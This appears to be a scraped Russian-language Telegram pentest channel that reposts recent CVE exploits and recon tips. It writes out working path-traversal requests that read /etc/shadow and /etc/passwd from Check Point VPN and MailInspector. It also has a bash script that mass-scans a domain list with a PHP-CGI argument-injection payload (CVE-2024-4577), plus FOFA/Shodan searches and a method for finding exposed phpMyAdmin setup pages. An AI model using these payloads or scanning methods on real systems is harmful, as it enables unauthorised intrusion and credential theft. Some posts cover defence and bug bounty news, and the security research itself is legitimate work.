Pentest Notes
1.16K subscribers
141 photos
5 videos
5 files
75 links
https://www.pentestnotes.ru

Заметки про пентест, CTF и информационную безопасность

https://t.iss.one/github_exploits
Download Telegram
Forwarded from Proxy Bar
CVE-2024-32002 GIT RCE
*
Удаленного выполнения кода в подмодулях Git.
Payload может быть активирован через рекурсивное клонирование репозитория Git.
*
POC exploit

#git #rce
🔥1
Forwarded from Proxy Bar
PhpMyAdmin Setup - доступен без аутентификации )))
****
1. ищем хосты через shodan и censys
2. все IP сканим на на ниличие службы ПХПмайАдмин
3. wappalyzer покажет php, лучше использовать php.txt
4. phpMyAdmin/setup найден ))
🔥1
Forwarded from Proxy Bar
CVE-2024-24919
*
Check Point Remote Access VPN 0-Day
*
FOFA link
*
POC:
POST /clients/MyCRL HTTP/1.1
Host: <redacted>
Content-Length: 39

aCSHELL/../../../../../../../etc/shadow


#0day #checkpoint
🔥2
Forwarded from Proxy Bar
CVE-2024-4577 Argument Injection in PHP-CGI
*
При разработке PHP упустил из виду функцию преобразования символов Best-Fit в Windows. Когда PHP-CGI работает на платформе Windows и использует определенные кодовые страницы (упрощенный китайский 936, традиционный китайский 950, японский 932 и т. д.), атакующий может создавать вредоносные запросы для обхода исправления CVE-2012-1823. Это позволяет им выполнять произвольный код PHP без необходимости аутентификации.
*
fofa link (610,604 хостов)

#php #xamp
🔥1
Forwarded from Proxy Bar
CVE-2024-4577 Argument Injection in PHP-CGI
ДОПОЛНЕНИЕ к предыдущему посту
BASH:
#!/bin/bash

# Function to check vulnerability for a domain
check_vulnerability() {
local domain=$1
local response=$(curl -s -X POST "${domain}/test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" \
-H "User-Agent: curl/8.3.0" \
-H "Accept: */*" \
-H "Content-Length: 23" \
-H "Content-Type: application/x-www-form-urlencoded" \
-H "Connection: keep-alive" \
--data "<?php phpinfo(); ?>" \
--max-time 10)

if [[ $response == *"PHP Version"* ]]; then
echo "$domain: Vulnerable"
fi
}

# Main function to iterate over domains
main() {
local file=$1
while IFS= read -r domain || [ -n "$domain" ]; do
check_vulnerability "$domain"
done < "$file"
}

# Check if the file argument is provided
if [ "$#" -ne 1 ]; then
echo "Usage: $0 <domain_list_file>"
exit 1
fi

# Call the main function with the domain list file
main "$1"


*
Сохраняйте скрипт и по списку доменов:
./CVE-2024-4577_script.sh /path/to/domains-list

#php #xamp
🔥1
Forwarded from Proxy Bar
CVE-2024-34470 HSC MailInspector
*
POC:
GET /mailinspector/public/loader.php?path=../../../../../../../etc/passwd

FOFA:
title=="..:: HSC MailInspector ::.."
🚨 Новая статья о RCE через Dependency Confusion!

Атаки на цепочку поставок, такие как "Dependency Confusion", становятся всё более изощрёнными. Злоумышленники создают пакеты с именами, идентичными приватным пакетам компаний, и загружают их в публичные репозитории. Система сборки скачивает эти вредоносные пакеты, что может привести к удалённому выполнению кода (RCE).

Примеры влзможных защитных мер включают в себя цифровые подписи пакетов, мониторинг зависимостей и тестирование в изолированных средах. Комплексный подход и регулярный аудит критически важны для безопасности.

📖 Узнайте больше и защитите свои проекты
🔥4
🔥 Нашли файл .DS_Store? Не игнорируйте! Это может быть потенциальный вектор атаки.

Что это такое? 🤔

Файл .DS_Store (Desktop Services Store) — это скрытый файл, который macOS создает в каждой директории для хранения информации о настройках отображения. По умолчанию эти файлы скрыты, поэтому невнимательные администраторы могут их пропустить и оставить в общедоступных директориях веб-сервера.

Почему это полезно? 🛠

Файл .DS_Store хранит информацию о структуре директорий. Разобрав этот файл, можно получить список всех файлов и папок в данной директории. Это особенно полезно, если названия файлов генерируются случайно и их нельзя сбрутить.


Реальный кейс 🚀

📌 При обычном сканировании директорий в корне сайта был найден .DS_Store. С помощью утилиты Python-dsstore можно было посмотреть файловое окружение, таким образом была восстановлена структура сайта. Меня заинтересовала директория files, в которой, о чудо оказался еще один .DS_Store, который раскрывал все файлы и директории рядом (см. фото). В том числе и те, которые пользователь явно не должен был видеть.

📌 Пробежав по директориям и изучив все файлы, удалось получить учетные данные от админки сайта.


💡 Для автоматизации поиска и анализа файлов .DS_Store можно использовать Python-скрипты и такие инструменты как ds_store_extractor. Это поможет сэкономить время и быстро получить структуру директорий.
2👍2
CVE-2024-33113 D-LINK DIR-845L information disclosure

Уязвимость раскрытия информации в D-LINK DIR-845L через файл bsc_sms_inbox.php.

Exploit

*
FOFA: 496 results
*

#dlink #cve
🔥2
CVE-2024-33111
D-LINK DIR-845L XSS


Маршрутизаторы D-Link DIR-845L версии 1.01KRb03 и ниже уязвимы для межсайтового скриптинга (XSS) через эндпоинт /htdocs/webinc/js/bsc_sms_inbox.php

Exploit


FOFA: 496 results
Shodan: 33 results
Censys: 42 results


#dlink #cve #xss
🔥2
Для удобства, решил сделать свой телеграм канал, куда будут публиковаться все новые PoC с github.

https://t.iss.one/github_exploits
👍3
cve-2024-6387-poc.zip
21.1 KB
CVE-2024-6387 with PoC

Обнаружена критическая уязвимость в сервере OpenSSH (sshd), в версиях с 8.5p1 по 9.8p1, затрагивающая Linux-системы на базе glibc. CVE-2024-6387, связана с race condition обработчиков сигналов SIGALRM, которая может привести к удаленному выполнению кода от имени root из-за использования функций async-signal-unsafe.

Почитать подробнее можно скачав PoC
🔥3👍1
Позвали в приватку, потестить ПО для управления инфраструктурой
Как обычно начинаю искать, куда можно пихнуть мои любимые XSS-ки, захожу в закладки а тут вот)

Гермиона, привет)
Спасибо, что предупредила, отправлять им такое, пожалуй, не буду
😁9👍2
BI.ZONE Bug Bounty обновили свою платформу, выглядит очень симпатично)

Что нового:

🔵Изменили стилевое и цветовое оформление. Визуальная часть стала более атмосферной и тематической.

🔵Внедрили систему тегов. Теперь легко отфильтровать программы по нужным критериям. Например, кто отвечает за триаж ­— компания или наши эксперты, можно ли перевести выплату на благотворительность.

🔵Добавили метрику для программы. Появилась возможность посмотреть среднее время обработки отчета в рамках каждой программы. Учитывается период с момента отправки репорта до получения информации о его финальном статусе.

Подробнее можно почитать тут:
https://t.iss.one/bizone_bb/265
Please open Telegram to view this post
VIEW IN TELEGRAM
2🔥1
This media is not supported in your browser
VIEW IN TELEGRAM
Казалось бы, описание новой критической RCE-уязвимости в Битриксе (CVSS 9.5) появилось относительно недавно, а хакеры уже все сломали.

Половина всех VMBitrix, которые видны в поисковых системах на данный момент либо мертвы, либо взломаны.

FOFA - 218 results


BDU:2024-05252
CVE-2022-29268
🔥3
При проведении пентеста важно понимать, какие домены принадлежат целевой организации. Собранная информация позволяет составить более полное представление о возможных точках входа и слабых местах.

Для этого я использую сервис Backorder
Он полезен для поиска всех доменов, связанных с определенной организацией. Особенно ценно, когда нужно понять всю доменную структуру компании.

1. Вводим доменное имя, например, "ya.ru".
2. Нажимаем на значение поля "Org".
3. Ставим галочку "Все домены".

В качестве альтернативы можно использовать https://viewdns.info/reversewhois/ (а лучше исполоьзовать оба, для получения более полной информации)
👍31